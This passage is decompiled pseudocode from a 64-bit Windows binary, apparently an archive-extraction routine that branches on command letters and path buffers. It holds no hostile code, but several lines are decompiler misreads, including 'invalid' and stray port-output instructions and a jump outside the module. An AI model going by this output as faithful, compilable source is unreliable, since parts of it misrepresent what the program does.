				intOrPtr _t694;
				void* _t706;
				signed int _t755;
				intOrPtr _t787;
				intOrPtr* _t820;
				signed int _t828;
				intOrPtr _t829;
				long long _t841;
				signed int _t842;
				long long _t846;
				signed long long _t848;
				long long _t851;
				long long _t854;
				signed long long _t856;
				signed int* _t858;
				signed long long _t859;
				void* _t861;
				long long _t862;
				long long _t863;
				signed long long _t865;
				signed int _t867;
				intOrPtr _t926;
				void* _t935;
				intOrPtr _t937;
				long long _t942;
				signed long long _t981;
				signed long long _t986;
				void* _t992;
				signed long long _t994;
				void* _t1004;
				signed int* _t1020;
				signed long long _t1025;
				signed long long _t1029;
				void* _t1032;
				void* _t1035;
				long long _t1075;
				signed long long _t1079;
				void* _t1082;
				void* _t1083;
				intOrPtr* _t1084;
				void* _t1087;
				void* _t1089;

				_t1029 = __rsi;
				_t1020 = __rdi;
				_t861 = __rbx;
				_t622 = __edi;
				if ( *((intOrPtr*)(__rsi + 0x4588)) - __r15 >= 0) goto 0x50b304a9;
				 *((long long*)(__rsi + 0x4588)) = __r15;
				_t867 =  *(__r14 + 8);
				if ( *((intOrPtr*)(_t867 + 0x7170)) != r15d) goto 0x50b304d3;
				if (__rax -  *((intOrPtr*)(_t867 + 0xb580)) < 0) goto 0x50b304d3;
				if ( *(__r14 + 0x1f5) != r15b) goto 0x50b30435;
				 *(_t1035 + 0x52) = r15b;
				_t9 = _t1029 + 0x3518; // 0x7a98
				 *((intOrPtr*)(_t1035 + 0x30)) = 0x800;
				_t820 = _t1032 + 0x3020;
				 *((long long*)(_t1035 + 0x28)) = _t820;
				 *(_t1035 + 0x20) = r15b;
				r9d = 6;
				_t529 = __ebx & 0xffffff00 | E00007FF67FF650B24498(__ecx, __edx, __rbx, _t867, _t9, __rdi, __rsi, _t1032, _t1035 + 0x52) != 0x00000000;
				 *(_t1035 + 0x54) = _t529;
				r12b = _t529;
				if ( *((intOrPtr*)( *(__r14 + 8) + 0x716c)) != 2) goto 0x50b30572;
				r8d = 0x800;
				_t392 = E00007FF67FF650B5A390( *(__r14 + 8) + 0x4030, _t1032 + 0x3020, _t1035 + 0x52);
				r15d = 0x4030;
				E00007FF67FF650B4511C(_t392, _t820,  *(__r14 + 8) + __r15);
				r9d = 0;
				 *_t820 = r9w;
				_t394 = E00007FF67FF650B4498C(_t820,  *(__r14 + 8) + __r15);
				r15d = 0;
				if (_t394 == 0) goto 0x50b30572;
				 *((intOrPtr*)( *(__r14 + 8) + 0x4030)) = r15w;
				if (_t529 == 0) goto 0x50b30584;
				if ( *(_t1035 + 0x52) != r15b) goto 0x50b30584;
				 *(__r14 + 0x1f5) = r15b;
				E00007FF67FF650B1C21C(__edx, _t1029);
				_t27 = _t861 + 1; // 0x1
				r15d = _t27;
				if ( *((intOrPtr*)(_t1029 + 0x45c0)) == 0) goto 0x50b30666;
				if ( *((intOrPtr*)(__r14 + 0x1f4)) == 0) goto 0x50b30666;
				if ( *((intOrPtr*)(__r14 + 0x1f7)) != 0) goto 0x50b30666;
				_t862 = __r14 + 0x1fa;
				r8d = 0x800;
				E00007FF67FF650B5A390(_t1032 - 0x80, _t862, _t1035 + 0x52);
				 *(_t1035 + 0x20) = 0x800;
				r8b =  *(_t1029 + 0x7f82);
				E00007FF67FF650B31628( *((intOrPtr*)(__r14 + 0x1f7)),  *(__r14 + 8), _t862, _t862, _t862);
				if (E00007FF67FF650B5D600(_t862, _t1032 - 0x80) == 0) goto 0x50b3062c;
				if (E00007FF67FF650B3345C() == 0) goto 0x50b3062c;
				r8d = 0x800;
				E00007FF67FF650B5A390( *(__r14 + 8) + 0xa54a, _t862, _t1035 + 0x52);
				 *_t1020 = r15b;
				goto 0x50b30435;
				if ( *(__r14 + 0x1f6) != 0) goto 0x50b30652;
				 *(__r14 + 0x1f6) = r15b;
				r8b = r15b;
				0x50b4bb88();
				if (0 != 0) goto 0x50b30624;
				r8d = 0x800;
				E00007FF67FF650B5A390(_t862, _t1032 - 0x80, _t1035 + 0x52);
				_t42 = _t1029 + 0x3540; // 0x7ac0
				r8d = 0x800;
				E00007FF67FF650B436A4( *(__r14 + 8), _t862, _t42, _t1032 + 0x2020, _t1035 + 0x52);
				if ( *((intOrPtr*)(_t1029 + 0x461b)) == 0) goto 0x50b306e1;
				if ( *((intOrPtr*)( *(__r14 + 8) + 0x84fc)) == r15d) goto 0x50b30705;
				if ( *(_t1035 + 0x52) != 0) goto 0x50b30705;
				asm("inc eax");
				dil = dil & r12b;
				 *(_t1035 + 0x54) = _t622;
				if ( *((intOrPtr*)( *(__r14 + 8) + 0x84fc)) - r15d != E00007FF67FF650B450A0(0,  *(__r14 + 8), _t862, _t1029)) goto 0x50b306d8;
				E00007FF67FF650B450A0(r15b,  *(__r14 + 8), _t862, _t1029);
				goto 0x50b30709;
				dil = 0;
				 *(_t1035 + 0x54) = _t622;
				goto 0x50b30709;
				if (E00007FF67FF650B1C374(_t1029) != 0) goto 0x50b30709;
				_t625 =  >  ? 0 : dil & 0xffffffff;
				goto 0x50b306db;
				_t626 =  *(_t1035 + 0x54);
				 *((char*)(__r14 + 0x123)) =  *((intOrPtr*)(_t1029 + 0x45c1));
				 *((char*)(__r14 + 0x124)) = 0;
				r8d = 0;
				 *0x50b80550();
				r9b = 0;
				 *(_t1035 + 0x50) = 0;
				if ( *((intOrPtr*)(__r14 + 0x1f4)) == 0) goto 0x50b3079e;
				if (dil != 0) goto 0x50b3075f;
				if ( *(_t1029 + 0x7f7c) == 0) goto 0x50b3079e;
				if ( *((intOrPtr*)(_t1029 + 0x45c0)) == 0) goto 0x50b3079e;
				if (dil == 0) goto 0x50b30797;
				_t68 = _t1029 + 0x3a; // 0x45ba
				E00007FF67FF650B2CC24(E00007FF67FF650B112C8(0x46, _t68, _t1032 + 0x2020), 6, dil, 0x50ba7ab8);
				r9b = 0;
				dil = 0;
				 *(_t1035 + 0x54) = _t626;
				 *((char*)(__r14 + 0x1f4)) = 0;
				if ( *((intOrPtr*)(_t1029 + 0x45c3)) == 0) goto 0x50b307ce;
				if ( *((intOrPtr*)( *(__r14 + 8) + 0x6133)) == 0) goto 0x50b307ce;
				if ( *(_t1029 + 0x7f7c) != 0) goto 0x50b30435;
				dil = 0;
				 *(_t1035 + 0x54) = _t626;
				goto 0x50b307d3;
				if (dil != 0) goto 0x50b307e8;
				r9b =  *(_t1029 + 0x7f7c);
				 *(_t1035 + 0x50) = r9b;
				if (r9b == 0) goto 0x50b314d0;
				_t533 = dil;
				if ( *((intOrPtr*)( *(__r14 + 8) + 0x7439)) == 0) goto 0x50b30802;
				r8b = r15b;
				if (r13d != 0x49) goto 0x50b30805;
				r8b = 0;
				if (E00007FF67FF650B5D040() == 0) goto 0x50b30435;
				_t1084 = __r14 + 0x11fc;
				 *(_t1035 + 0x20) = 0x800;
				_t981 = _t1029;
				E00007FF67FF650B2FB5C( *(__r14 + 8), _t862, __r14, _t981, _t1029, _t1032 + 0x2020, _t1084);
				if ( *(_t1035 + 0x50) != 0) goto 0x50b3085d;
				if ( *_t1084 == 0) goto 0x50b3085d;
				dil = r15b;
				if ( *((intOrPtr*)(_t1029 + 0x45c0)) == 0) goto 0x50b30860;
				dil = 0;
				 *(_t1035 + 0x5c) = _t626;
				_t828 =  *(__r14 + 8);
				_t91 = _t981 + 0x13; // 0x58
				r8d = _t91;
				if ( *((intOrPtr*)(_t828 + 0x7167)) != 0) goto 0x50b30881;
				if ( *((intOrPtr*)(_t828 + 0x7168)) == 0) goto 0x50b308e5;
				if (r13w == 0x45) goto 0x50b3088d;
				if (r13w != r8w) goto 0x50b308e5;
				 *((long long*)(_t1032 + 0xf90)) = __r14;
				 *((long long*)(_t1032 + 0xf98)) = __r14;
				 *((long long*)(_t1032 + 0xfa0)) = __r14;
				r8d = 0;
				if (E00007FF67FF650B3494C(_t828, _t862, _t1084, _t1032 - 0x80) == 0) goto 0x50b30924;
				_t829 =  *((intOrPtr*)(_t1032 + 0xf90));
				_t683 = _t829 -  *((intOrPtr*)(_t1029 + 0x4568));
				if (_t683 > 0) goto 0x50b308c9;
				if (_t683 != 0) goto 0x50b308e5;
				if ( *((intOrPtr*)(_t1032 + 0xf8c)) == 0) goto 0x50b308da;
				 *(_t1035 + 0x54) = _t533;
				if (_t829 -  *((intOrPtr*)(__r14)) >= 0) goto 0x50b308e5;
				dil = 0;
				 *(_t1035 + 0x5c) = _t626;
				 *(_t1035 + 0x54) = _t533;
				if (E00007FF67FF650B2EF9C(0, _t829, _t862, _t1029) != 0) goto 0x50b3093d;
				E00007FF67FF650B2CC24(_t414, 2, E00007FF67FF650B2EF9C(0, _t829, _t862, _t1029), 0x50ba7ab8);
				E00007FF67FF650B1A3E8();
				goto 0x50b30437;
				_t628 =  !=  ? 0 : dil & 0xffffffff;
				 *(_t1035 + 0x5c) = _t628;
				goto 0x50b308e7;
				if ( *((intOrPtr*)(_t1029 + 0x45c3)) == 0) goto 0x50b3095f;
				_t690 = E00007FF67FF650B2FA6C( *(__r14 + 8), _t862, __r14, _t1032 + 0x2020);
				if (_t690 == 0) goto 0x50b30aa7;
				asm("movups xmm0, [eax]");
				asm("movups [ecx], xmm0");
				asm("movups xmm1, [eax+0x10]");
				asm("movups [ecx+0x10], xmm1");
				asm("movups xmm0, [eax+0x20]");
				asm("movups [ecx+0x20], xmm0");
				asm("movups xmm1, [eax+0x30]");
				asm("movups [ecx+0x30], xmm1");
				asm("movups xmm0, [eax+0x40]");
				asm("movups [ecx+0x40], xmm0");
				asm("movups xmm1, [eax+0x50]");
				asm("movups [ecx+0x50], xmm1");
				asm("movups xmm0, [eax+0x60]");
				asm("movups [ecx+0x60], xmm0");
				asm("movups xmm1, [eax+0x70]");
				asm("movups [ecx-0x10], xmm1");
				if (_t690 != 0) goto 0x50b30972;
				 *((short*)(_t1032 - 0x80 + 0x80)) =  *( *(__r14 + 8) + 0x60b0) & 0x0000ffff;
				_t986 = _t1029;
				E00007FF67FF650B2F008(_t862, __r14, _t986, _t1032 - 0x80);
				_t1085 = __r14 + 0x10;
				asm("dec eax");
				 *((long long*)(_t1035 + 0x40)) = _t1032 + 0x2010;
				 *((long long*)(_t1035 + 0x38)) = _t1029 + 0x45f3;
				 *((intOrPtr*)(_t1035 + 0x30)) =  *((intOrPtr*)(_t1029 + 0x4614));
				 *((long long*)(_t1035 + 0x28)) = _t1029 + 0x45d9;
				 *(_t1035 + 0x20) = _t986 & _t1029 + 0x000045c9;
				_t1075 = _t1032 - 0x80;
				r8d =  *((intOrPtr*)(_t1029 + 0x45c4));
				E00007FF67FF650B49B40(0, __r14 + 0x10);
				if ( *((intOrPtr*)(_t1029 + 0x45c3)) == 0) goto 0x50b30ad5;
				if ( *((intOrPtr*)(_t1029 + 0x45e9)) == 0) goto 0x50b30ad5;
				if ( *((intOrPtr*)(_t1029 + 0x45ea)) ==  *(_t1032 + 0x2010)) goto 0x50b30ad5;
				_t694 =  *((intOrPtr*)(_t1029 + 0x7f90));
				asm("sahf");
				if (_t694 > 0) goto 0x50b30a67;
				 *((intOrPtr*)(_t1032 + 0x6b)) =  *((intOrPtr*)(_t1032 + 0x6b));
				if ( *((intOrPtr*)(__r14 + 0x11fa)) != 0) goto 0x50b30ab3;
				E00007FF67FF650B112C8(0x83, _t1029 + 0x3a, _t1032 + 0x2020);
				E00007FF67FF650B5785C(_t628, _t638,  *(__r14 + 8) + 0x6030, _t1020);
				E00007FF67FF650B5785C(_t628, _t638, _t1032 - 0x80, _t1020);
				goto 0x50b3093d;
				 *(__r14 + 0x21fc) = r15b;
				goto 0x50b30435;
				E00007FF67FF650B2CC24(E00007FF67FF650B112C8(6, _t1029 + 0x3a, _t1032 + 0x2020), 0xb,  *((intOrPtr*)(__r14 + 0x11fa)), 0x50ba7ab8);
				dil = 0;
				 *(_t1035 + 0x5c) = _t628;
				E00007FF67FF650B5785C(_t628, _t638, _t1032 - 0x80, _t1020);
				E00007FF67FF650B31C28(_t1032 + 0xfd0);
				_t431 =  *(_t1029 + 0x4630);
				 *(_t1035 + 0x60) = _t431;
				if (_t431 == 0) goto 0x50b30b97;
				if (_t431 == 5) goto 0x50b30b97;
				if (dil == 0) goto 0x50b30c21;
				if (r13w == 0x50) goto 0x50b30c61;
				if ( *((intOrPtr*)( *(__r14 + 8) + 0x7439)) != 0) goto 0x50b30c68;
				 *(_t1035 + 0x51) = 0;
				if (E00007FF67FF650B3345C() == 0) goto 0x50b30b85;
				if ( *(_t1035 + 0x51) != 0) goto 0x50b30b8f;
				 *((char*)(_t1035 + 0x38)) = 0;
				 *((long long*)(_t1035 + 0x30)) = _t1029 + 0x4568;
				 *((long long*)(_t1035 + 0x28)) =  *((intOrPtr*)(_t1029 + 0x4588));
				 *(_t1035 + 0x20) = _t1035 + 0x51;
				r9d = 0x800;
				E00007FF67FF650B317E8(_t862,  *(__r14 + 8), _t1029 + 0x3a, __r14 + 0x11fc, _t1029, _t1032, __r14 + 0x11fc, _t1075);
				if ( *(_t1035 + 0x51) == 0) goto 0x50b30c68;
				dil = 0;
				goto 0x50b30c18;
				if (E00007FF67FF650B1C374(_t1029) == 0) goto 0x50b30bfe;
				if (dil == 0) goto 0x50b30bea;
				r13w = r13w - 0x45;
				_t706 = r13w - 0xb;
				if (_t706 > 0) goto 0x50b30bc3;
				asm("inc esp");
				if (_t706 < 0) goto 0x50b30bea;
				_t840 =  *(__r14 + 8);
				if ( *((intOrPtr*)( *(__r14 + 8) + 0x716c)) == r15d) goto 0x50b30bea;
				 *((intOrPtr*)(__r14 + 0x1e8)) =  *((intOrPtr*)(__r14 + 0x1e8)) + r15d;
				E00007FF67FF650B2F528(0,  *(__r14 + 8), __r14, _t1029, _t1032 + 0x2020, _t1075);
				E00007FF67FF650B31C70(_t1032 + 0xfd0);
				goto 0x50b30437;
				if (dil == 0) goto 0x50b30c21;
				dil = E00007FF67FF650B2F87C(0x811, _t840, _t862, __r14, _t1029, _t1032 + 0xfd0);
				 *(_t1035 + 0x5c) = _t628;
				if (dil != 0) goto 0x50b30c61;
				if ( *(_t1029 + 0x7f7c) == 0) goto 0x50b30c58;
				 *(_t1035 + 0x50) = r15b;
				 *(_t1035 + 0x5c) = r15b;
				r9b = r15b;
				r8d = 0;
				if (E00007FF67FF650B5D040() != 0) goto 0x50b30d2d;
				r15b = dil;
				goto 0x50b30bea;
				if (dil == 0) goto 0x50b314ac;
				_t1022 = __r14 + 0x11fc;
				_t841 =  *(__r14 + 8);
				if ( *((intOrPtr*)(_t841 + 0x7439)) == 0) goto 0x50b30c89;
				 *(__r14 + 0x11fb) = r15b;
				if ( *((intOrPtr*)(_t841 + 0x7439)) != 0) goto 0x50b30c91;
				if ( *(_t1035 + 0x50) == 0) goto 0x50b30c94;
				_t539 = r15b;
				 *(_t1035 + 0x51) = _t539;
				E00007FF67FF650B37F90(r15d, _t637, _t841, _t862, 0x50ba7a90, _t1032 + 0x2020, _t1075);
				if ( *(_t1035 + 0x50) != 0) goto 0x50b30d04;
				if (_t539 != 0) goto 0x50b30cfd;
				if (r13w == 0x50) goto 0x50b30cfd;
				if (E00007FF67FF650B32194(_t1032 + 0xfd0) == 0) goto 0x50b30cf9;
				E00007FF67FF650B112C8(0x3b, _t1029 + 0x3a, __r14 + 0x11fc);
				_t992 = _t1029 + 0x3a;
				E00007FF67FF650B2CE04(_t539, 0x3b, E00007FF67FF650B32194(_t1032 + 0xfd0), 0x50ba7ab8, _t992, __r14 + 0x11fc, _t1029, _t1032, __r14 + 0x11fc);
				 *((intOrPtr*)(__r14 + 0x1e8)) =  *((intOrPtr*)(__r14 + 0x1e8)) + r15d;
				 *((intOrPtr*)(__r14 + 0x1ec)) =  *((intOrPtr*)(__r14 + 0x1ec)) + r15d;
				if (r13d == 0x49) goto 0x50b30d7e;
				if ( *((intOrPtr*)( *(__r14 + 8) + 0x7157)) != 0) goto 0x50b30d7e;
				if ( *(_t1035 + 0x50) == 0) goto 0x50b30d39;
				goto 0x50b30ead;
				goto 0x50b30c6c;
				_t448 =  !=  ? 0x54 : r13d;
				if (_t448 == _t992 - 0xf) goto 0x50b30d69;
				if (_t448 == 0x50) goto 0x50b30ebe;
				if (_t448 == 0x54) goto 0x50b30ea8;
				if (_t448 != _t992 + 4) goto 0x50b30d7e;
				E00007FF67FF650B54598(0xd6a, 0, _t862, _t1029, _t1032, _t1022);
				E00007FF67FF650B283F0(_t841, __r14 + 0x11fc, _t1022, _t1075);
				_t842 =  *(__r14 + 8);
				if ( *((intOrPtr*)(_t842 + 0x7154)) != 0) goto 0x50b30d9e;
				if ( *((intOrPtr*)(_t842 + 0x7157)) != 0) goto 0x50b30d9e;
				E00007FF67FF650B283F0(L"     ", __r14 + 0x11fc, _t1022, _t1075);
				if ( *((intOrPtr*)( *(__r14 + 8) + 0x7157)) == 0) goto 0x50b30daf;
				E00007FF67FF650B5CDDC();
				 *((long long*)(__r14 + 0x138)) = _t862;
				 *((long long*)(__r14 + 0x140)) = _t862;
				_t1024 = _t1029 + 0x4598;
				_t863 = __r14 + 0x1b8;
				r8d =  *((intOrPtr*)( *(__r14 + 8) + 0x9518));
				E00007FF67FF650B366EC( *((intOrPtr*)(_t1029 + 0x4598)), _t863, _t863, _t1029, _t1082, _t1083);
				r8d =  *((intOrPtr*)( *(__r14 + 8) + 0x9518));
				E00007FF67FF650B366EC( *((intOrPtr*)(_t1029 + 0x4598)), _t863, __r14 + 0x178, _t1029, _t1082, _t1083);
				_t846 =  *(_t1029 + 0x4580);
				 *((long long*)(__r14 + 0xb8)) = _t846;
				 *((long long*)(__r14 + 0xb0)) = _t846;
				_t994 = _t1029;
				E00007FF67FF650B49BBC(_t846, _t1085, _t994, _t1032 + 0xfd0);
				dil =  *(_t1035 + 0x51);
				 *(__r14 + 0xc1) = dil;
				 *((char*)(__r14 + 0xc2)) =  *(_t1035 + 0x50);
				if (dil != 0) goto 0x50b30ec5;
				if ( *((intOrPtr*)(_t1029 + 0x7f90)) != 0) goto 0x50b30ec5;
				if ( *((intOrPtr*)(_t1029 + 0x4588)) - _t846 <= 0) goto 0x50b30ec5;
				if ( *((intOrPtr*)(__r14 + 0x21fd)) != 0) goto 0x50b30e93;
				if ( *((intOrPtr*)(__r14 + 0x21fe)) != 0) goto 0x50b30ec5;
				_t458 = E00007FF67FF650B336EC(_t846);
				 *((char*)(__r14 + 0x21fd)) = _t458;
				 *((char*)(__r14 + 0x21fe)) = 0xd00 | _t458 == 0x00000000;
				if (_t458 == 0) goto 0x50b30ec5;
				E00007FF67FF650B164E4(0x7e);
				 *(_t1032 + 0x2010) = _t994;
				goto 0x50b30ed1;
				asm("out 0x36, al");
				goto 0x50b30d76;
				goto 0x50b30ead;
				 *(_t1032 + 0x2010) = _t1032 + 0x2020;
				if (dil != 0) goto 0x50b30f3c;
				if ( *((intOrPtr*)(_t1029 + 0x7f90)) != 0) goto 0x50b30f3c;
				_t926 =  *((intOrPtr*)(_t1029 + 0x4588));
				if (_t926 - 0xf4240 <= 0) goto 0x50b30f3c;
				_t848 =  *(_t1029 + 0x4580) << 0xa;
				if (_t848 - _t926 <= 0) goto 0x50b30f3c;
				if ( *((intOrPtr*)(_t1029 + 0x14)) == r15d) goto 0x50b30f3c;
				if (_t926 - 0x5f5e100 < 0) goto 0x50b30f19;
				E00007FF67FF650B320B8(_t863, _t1029, _t1029);
				if (_t848 -  *(_t1029 + 0x4580) <= 0) goto 0x50b30f3a;
				E00007FF67FF650B32388(_t1032 + 0xfd0);
				_t849 =  *((intOrPtr*)(_t1029 + 0x4588));
				 *(_t1032 + 0x2010) =  *((intOrPtr*)(_t1029 + 0x4588));
				if (r13d != 0x49) goto 0x50b30f4b;
				if ( *(_t1035 + 0x50) != 0) goto 0x50b30f4b;
				 *(_t1035 + 0x20) = _t1029 + 0x3540;
				E00007FF67FF650B49C14(r15b, 0, _t863, _t1085, _t1029,  *(__r14 + 8) + 0x952c, _t1029 + 0x3a);
				 *((char*)(_t1032 + 0xff1)) =  *((intOrPtr*)( *(__r14 + 8) + 0x71c4)) == 0;
				if (dil != 0) goto 0x50b30f98;
				if ( *(_t1035 + 0x50) != 0) goto 0x50b30f98;
				dil = r15b;
				if (r13w !=  *((intOrPtr*)(_t1029 + 0x4588)) + 0x50) goto 0x50b30f9b;
				dil = 0;
				r13b = r15b;
				r12b = r15b;
				if ( *(_t1035 + 0x60) == 0) goto 0x50b310b3;
				_t541 =  *(_t1029 + 0x4630);
				if (_t863 - 4 - r15d <= 0) goto 0x50b30ffe;
				if (_t863 - 1 - 2 <= 0) goto 0x50b30fe0;
				E00007FF67FF650B112C8(0x47, _t1029 + 0x3a, __r14 + 0x11fc);
				r12b = 0;
				goto 0x50b3108e;
				_t755 = dil;
				if (_t755 == 0) goto 0x50b31080;
				_t1056 = _t1029;
				E00007FF67FF650B2E0C4(0x4580, _t1029, __r14 + 0x11fc);
				asm("invalid");
				if (_t755 >= 0) goto 0x50b3104b;
				 *(_t1035 + 0x20) = 0x800;
				E00007FF67FF650B2FB5C(_t849, _t863, __r14, _t1029, _t1029, _t1056, _t1032 - 0x80);
				if (dil == 0) goto 0x50b31080;
				if ( *((intOrPtr*)(_t1032 - 0x80)) == 0) goto 0x50b31080;
				if (_t541 >> 1 != 4) goto 0x50b3104b;
				r9d = 0x800;
				_t471 = E00007FF67FF650B2DA44(_t541 >> 1, _t849, _t863,  *(__r14 + 8), __r14 + 0x11fc, _t1029, _t1032, _t1032 - 0x80, _t1032 - 0x80);
				goto 0x50b31077;
				 *((long long*)(_t1035 + 0x28)) = 0x800;
				 *(_t1035 + 0x20) = _t1032 - 0x80;
				_t1079 = __r14 + 0x11fc;
				L8();
				r12b = _t471;
				if (_t471 == 0) goto 0x50b3108e;
				if ( *((intOrPtr*)(_t1029 + 0x7f78)) != 2) goto 0x50b31091;
				if (dil != 0) goto 0x50b31096;
				r13b = 0;
				if (dil == 0) goto 0x50b3109e;
				if (r12b != 0) goto 0x50b310a0;
				 *(__r14 + 0x11fb) = 0;
				goto 0x50b31172;
				if ( *((intOrPtr*)(_t1029 + 0x45c0)) != 0) goto 0x50b31172;
				if ( *((intOrPtr*)(_t1029 + 0x3538)) != 0) goto 0x50b310dc;
				_t935 = __r14 + 0x10;
				E00007FF67FF650B31758(0, _t1032 - 0x80, __r14 + 0x1b8, _t935,  *((intOrPtr*)(_t1029 + 0x4588)), _t1029);
				goto 0x50b31172;
				if ( *((intOrPtr*)(_t935 + 0x71e0)) == 0) goto 0x50b310f5;
				if ( *((long long*)(_t1029 + 0x4620)) - 0x10000000 > 0) goto 0x50b31505;
				r8b =  *(_t1029 + 0x4618);
				E00007FF67FF650B5FCF0(0, __r14 + 0x1b8,  *((intOrPtr*)(__r14 + 0x1e0)),  *((intOrPtr*)(_t1029 + 0x4620)), _t1024, _t1029, _t1032, _t1029 + 0x3a);
				_t851 =  *((intOrPtr*)(_t1029 + 0x4588));
				_t937 =  *((intOrPtr*)(__r14 + 0x1e0));
				 *((long long*)(_t937 + 0x4db8)) = _t851;
				 *((char*)(_t937 + 0x4dd0)) = 0;
				if ( *((intOrPtr*)(_t1029 + 0x7f78)) == 3) goto 0x50b31159;
				if ( *((intOrPtr*)(_t1029 + 0x3534)) - _t851 + 0xf > 0) goto 0x50b31159;
				if ( *((intOrPtr*)(__r14 + 0x1ec)) - r15d <= 0) goto 0x50b31154;
				r8b = r15b;
				if ( *(_t1029 + 0x7f7c) != 0) goto 0x50b31166;
				r8b = 0;
				goto 0x50b31166;
				r8b =  *(_t1029 + 0x4618);
				0x50b5f0bc(0xe800000d);
				E00007FF67FF650B1A3E8();
				if ( *((intOrPtr*)(_t1029 + 0x45c1)) != 0) goto 0x50b311b1;
				asm("dec ebp");
				_t1004 = _t1029 + 0x4598;
				if (E00007FF67FF650B3667C(__r14 + 0x1b8, _t1004, _t1029 + 0x0000003a & _t1029 + 0x000045f3, _t1079) != 0) goto 0x50b311b3;
				if ( *(_t1029 + 0x4618) != 0) goto 0x50b311c4;
				 *(__r14 + 0x1f8) = 0;
				goto 0x50b311e0;
				if ( *((intOrPtr*)(_t1029 + 0x3538)) == 0) goto 0x50b311e0;
				if ( *((intOrPtr*)(_t1029 + 0x4588)) - _t1004 <= 0) goto 0x50b311e0;
				if (0 == 0) goto 0x50b311e0;
				 *(__r14 + 0x1f8) = r15b;
				if ( *(_t1035 + 0x50) != 0) goto 0x50b312cf;
				if (r13b == 0) goto 0x50b312e2;
				if (0 == 0) goto 0x50b31274;
				_t630 =  *(_t1035 + 0x58) & 0x0000ffff;
				if (_t630 == 0x50) goto 0x50b312e7;
				if (_t630 == 0x49) goto 0x50b312e7;
				if ( *((intOrPtr*)( *(__r14 + 8) + 0x7157)) != 0) goto 0x50b312e7;
				if ( *((intOrPtr*)(_t1029 + 0x4598)) != 0) goto 0x50b31237;
				_t854 = L"  ?";
				goto 0x50b31241;
				E00007FF67FF650B54598(0xd26, _t630, __r14 + 0x1b8, _t1029, _t1032, _t1029 + 0x0000003a & _t1029 + 0x000045f3);
				r9d = 0;
				_t1006 =  !=  ? " " : 0x50b81ba0;
				_t942 = L"%s%s ";
				E00007FF67FF650B283F0(_t942,  !=  ? " " : 0x50b81ba0, _t854, _t1079);
				goto 0x50b312e7;
				if ( *((intOrPtr*)(_t1029 + 0x45c3)) == 0) goto 0x50b3129a;
				_t787 =  *((intOrPtr*)(_t1029 + 0x45e9));
				goto 0xc4b312c8;
				if (_t787 > 0) goto 0x50b31289;
				 *((intOrPtr*)(_t1029 + _t942 + 0x41)) =  *((intOrPtr*)(_t1029 + _t942 + 0x41));
				if ( *((intOrPtr*)(_t1029 + 0x1f8)) == 0) goto 0x50b3129f;
				_t487 = E00007FF67FF650B112C8(3, _t1029 + 0x3a, _t1032 + 0x2020);
				_t544 = r15b;
				E00007FF67FF650B2CC24(_t487, 3,  *((intOrPtr*)(_t1029 + 0x1f8)), 0x50ba7ab8);
				goto 0x50b312eb;
				E00007FF67FF650B283F0(0x50b81bc0, _t1029 + 0x3a, _t1032 + 0x2020, _t1079);
				goto 0x50b31270;
				_t633 =  *(_t1035 + 0x58) & 0x0000ffff;
				_t1089 = _t1029 + 0x3a;
				_t490 =  *(_t1035 + 0x60);
				if (_t490 == 0) goto 0x50b31304;
				if ( *(_t1029 + 0x4630) != 4) goto 0x50b31304;
				if (r12b != 0) goto 0x50b31306;
				if ( *(_t1035 + 0x51) != 0) goto 0x50b314ac;
				r8d = 0x58;
				if (_t633 == r8w) goto 0x50b3132c;
				r8d = 0x45;
				if (_t633 != r8w) goto 0x50b314ac;
				if (_t490 == 0) goto 0x50b3134a;
				if (0 != 0) goto 0x50b3134a;
				if ( *(_t1029 + 0x4630) != 5) goto 0x50b314ac;
				if (r12b == 0) goto 0x50b314ac;
				if (_t544 == 0) goto 0x50b3135e;
				if ( *((intOrPtr*)( *(__r14 + 8) + 0x71c4)) == 0) goto 0x50b314ac;
				if (0 != 0) goto 0x50b3142c;
				_t856 =  *(_t1032 + 0x2010);
				if (_t856 == 0) goto 0x50b3138b;
				if (_t544 != 0) goto 0x50b3137f;
				if ( *((intOrPtr*)(__r14 + 0x140)) == _t856) goto 0x50b3138b;
				E00007FF67FF650B32940(_t1032 + 0xfd0);
				_t865 = _t1029 + 0x4578;
				_t1025 = _t1029 + 0x4568;
				asm("dec ebp");
				_t1080 = _t1079 & _t865;
				asm("dec ebp");
				asm("dec eax");
				E00007FF67FF650B32760(_t1032 + 0xfd0,  *(__r14 + 8) & _t1025, _t1032 + 0x00002020 & _t1029 + 0x00004570, _t1079 & _t865);
				E00007FF67FF650B2EE10(E00007FF67FF650B31CF0(_t865, _t1032 + 0xfd0));
				asm("dec ebp");
				asm("dec eax");
				E00007FF67FF650B2EE10( ~( *( *(__r14 + 8) + 0x8508)));
				goto 0x50b31433;
				_t1087 = __r14 + 0x11fc;
				if ( *((intOrPtr*)( *(__r14 + 8) + 0x73e5)) == 0) goto 0x50b31458;
				if (( *(_t1029 + 0x353c) & 0x00000800) == 0) goto 0x50b31458;
				_t506 = E00007FF67FF650B33E74(r15b,  *(__r14 + 8), _t865, _t1087);
				_t858 =  *(__r14 + 8);
				if (_t858[0x1c59] == 0) goto 0x50b3146b;
				 *(_t1029 + 0x353c) =  *(_t1029 + 0x353c) & 0xffffffdf;
				 *_t858 =  *_t858 + _t506;
				asm("fisttp word [ecx-0x75]");
				 *_t858 =  *_t858 | r15b;
				asm("out 0x73, al");
				 *_t858 =  *_t858 + _t506;
				if (_t506 != 0x35) goto 0x50b314a5;
				if (E00007FF67FF650B33DE4(_t544,  *(_t1029 + 0x353c), _t858, _t865, _t1087, _t1029) != 0) goto 0x50b314a5;
				_t1066 = _t1087;
				E00007FF67FF650B112C8(0x11, _t1089, _t1087);
				E00007FF67FF650B2CC94(_t544, 0x11,  *(_t1029 + 0x353c), E00007FF67FF650B33DE4(_t544,  *(_t1029 + 0x353c), _t858, _t865, _t1087, _t1029), _t865, _t1025, _t1029, _t1032, _t1087);
				 *(__r14 + 0x11fb) = r15b;
				_t510 = E00007FF67FF650B31C70(_t1032 + 0xfd0);
				r9b =  *(_t1035 + 0x50);
				if ( *(_t1035 + 0x54) == 0) goto 0x50b314d0;
				 *((intOrPtr*)(__r14 + 0x1f0)) =  *((intOrPtr*)(__r14 + 0x1f0)) + r15d;
				if ( *((intOrPtr*)(__r14 + 0x124)) != 0) goto 0x50b30435;
				if ( *(_t1035 + 0x5c) != 0) goto 0x50b30bf6;
				if ( *(_t1029 + 0x7f7c) != 0) goto 0x50b314fa;
				E00007FF67FF650B1A3E8();
				goto 0x50b30bf6;
				_t815 = r9b;
				goto 0x50b30437;
				E00007FF67FF650B1144C(_t510 & 0xffffff00 | r9b != 0x00000000, _t1035 + 0x68);
